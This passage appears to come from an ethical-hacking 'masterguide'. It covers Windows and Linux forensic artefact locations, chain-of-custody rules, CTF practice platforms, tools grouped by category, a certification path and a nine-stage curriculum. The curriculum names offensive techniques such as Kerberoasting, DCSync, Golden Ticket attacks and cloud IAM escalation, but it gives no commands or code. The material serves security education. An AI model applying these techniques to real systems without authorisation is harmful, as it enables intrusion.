Event Logs — C:\Windows\System32\winevt\Logs\
Registry — NTUSER.DAT, SAM, SYSTEM, SECURITY, SOFTWARE
Prefetch — C:\Windows\Prefetch\ (program execution)
Shellbags — Folder browsing history in registry
LNK files — Recent files accessed
Jump Lists — Recently accessed files per app
Browser History — SQLite DBs in user profile

🐧 Key Linux Artefacts

/var/log/auth.log — Authentication, sudo, SSH
/var/log/syslog — System events
~/.bash_history — Command history
/etc/cron.* — Scheduled tasks
/tmp/ /var/tmp/ — Often used for staging
/proc/ — Live system state
auditd logs — If enabled: full syscall audit

📋 Chain of Custody

Document EVERY action taken on evidence
Hash evidence before and after handling
Never work on original — always a forensic copy
Use write-blockers for disk imaging
Record: who, when, where, what for all evidence
Seal physical evidence with tamper-evident tape

Contaminated evidence is inadmissible in court. One mistake = case dismissed.

23

// HANDS-ON PRACTICE

CTF & Cyber Range Practice

Theory without practice is just trivia. Real skills come from 10,000 hours of hands-on hacking.

🏆 Best Practice Platforms

Platform	Level	Best For	Cost
TryHackMe	Beginner	Guided paths, browser VMs	Free+Pro
HackTheBox	Intermediate	Real-world machines	Free+VIP
PicoCTF	Beginner	Year-round CTF, CMU	Free
VulnHub	All	Offline VM practice	Free
PortSwigger	Intermediate	Best web app labs	Free
HackerOne	Advanced	Real bug bounty programs	Free

🎯 CTF Toolkit by Category

Category	Key Tools
🌐 Web	Burp Suite · sqlmap · ffuf · jwt_tool
🔐 Crypto	CyberChef · RsaCtfTool · hashcat
🔍 Forensics	Autopsy · Volatility · binwalk · exiftool
⚙️ Reversing	Ghidra · IDA Free · x64dbg · Radare2
💥 Pwn/BoF	pwntools · GDB+PEDA · ROPgadget · checksec
🕵️ OSINT	Maltego · Shodan · SpiderFoot
🌐 Network	Wireshark · tcpdump · NetworkMiner

// CERTIFICATION ROADMAP — ZERO TO ELITE

CompTIA
Security+

Foundation

→

CEH

EC-Council

→

eJPT

INE

→

OSCP

OffSec

→

CRTO

RastaMouse

→

CCNA / AWS

Cloud/Network

→

OSED / CRTE

Elite Track

1

Networking + Linux Fundamentals

OSI, TCP/IP, subnetting, Linux CLI — 3–4 weeks

BEGINNER

2

Cryptography Fundamentals

Hashing, AES, RSA, TLS — understand before you attack

BEGINNER+

3

Recon + Scanning + Enumeration

OSINT, Google dorks, Nmap, SMB/DNS/SMTP enum — 3 weeks

BEGINNER+

4

Web Application Hacking

OWASP Top 10, Burp Suite, SQLi, XSS, IDOR, API — 4–6 weeks

INTERMEDIATE

5

Network Pentesting + Metasploit

Exploits, wireless, pivoting, password attacks — 4 weeks

INTERMEDIATE

6

Active Directory Attacks

Kerberoasting, BloodHound, DCSync, Golden Ticket — 4 weeks

ADVANCED

7

Cloud Security (AWS/Azure/GCP)

S3 misconfig, IMDS exploit, IAM escalation, Pacu — 3 weeks

ADVANCED

8

Blue Team / DFIR / SIEM

Incident response, Volatility, YARA, log analysis, threat hunt — 4 weeks

ADVANCED

9

CTF Practice + Bug Bounty

TryHackMe → HackTheBox → OSCP labs → HackerOne

ONGOING ∞

ETHICAL HACKING

MASTERGUIDE